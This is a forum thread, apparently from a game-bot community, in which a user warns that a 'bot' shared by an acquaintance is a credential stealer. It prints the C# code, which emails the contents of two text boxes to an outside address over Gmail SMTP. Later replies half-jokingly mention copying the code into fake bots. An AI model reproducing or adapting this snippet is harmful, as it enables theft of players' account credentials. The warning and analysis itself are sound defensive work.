Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?
You are not logged in.
Pages: 1
Panasonic just sent me a disguised dig bot.
Good thing I looked at the code first before I even try to open the program.
Here's what I found
MailMessage mailMessage = new MailMessage(); try { mailMessage.From = new MailAddress("[snip:email]"); mailMessage.To.Add("<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="285c4d5c5a415b4a495c5c444d101810684f45494144064b4745">[email protected]</a><script cf-hash='f9e31' type="text/javascript"> /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>"); mailMessage.Subject = "Account"; mailMessage.Body = string.Concat(this.TextBox1.Text, this.TextBox2.Text); SmtpClient smtpClient = new SmtpClient("smtp.gmail.com"); smtpClient.Port = 0x24b; smtpClient.EnableSsl = true; smtpClient.Credentials = new NetworkCredential("[snip:email]", "[snip:password]"); smtpClient.Send(mailMessage); this.TextBox2.Text = "";
Panasonic was my friend and I also helped him with his other bots and I usually test it.
But this one is different.
This isn't the first time he's been caught.
No u.
Offline
Oh god. Why do people do this?
I can't log in "tetrisbattle's" account.
So I can't see who has been hacked :/
Managed to get into the account, I've disabled the email address by changing the password and recovery email.
There appear to have been no victims, partially due to panasonic being a nub and failing some email forwarding. I think it's time for a ban.
No u.
Offline
That's weird I have entered my fake account a few times.
But good that nobody got hacked
Just another nub. Panasonic can't create bots so he steal accounts instead. Smart idea maybe.
People are too dumb anyway.
Offline
I haven't heard of this problem ever. What's going on with this?
Awesome code. C&P on that one. Can be good to use in the future!
Offline
Usually panasonic makes some nubby code.
But this is different, It looks like somebody else coded it from him. (IDK)
Good thing you looked at it although it may have failed anyways good to know what his objective is.
Thanks for giving us the code to put this in our fake bots. XD Lol. Take it down.
Offline
Pages: 1
[ Started around 1731789604.1947 - Generated in 0.058 seconds, 14 queries executed - Memory usage: 1.41 MiB (Peak: 1.51 MiB) ]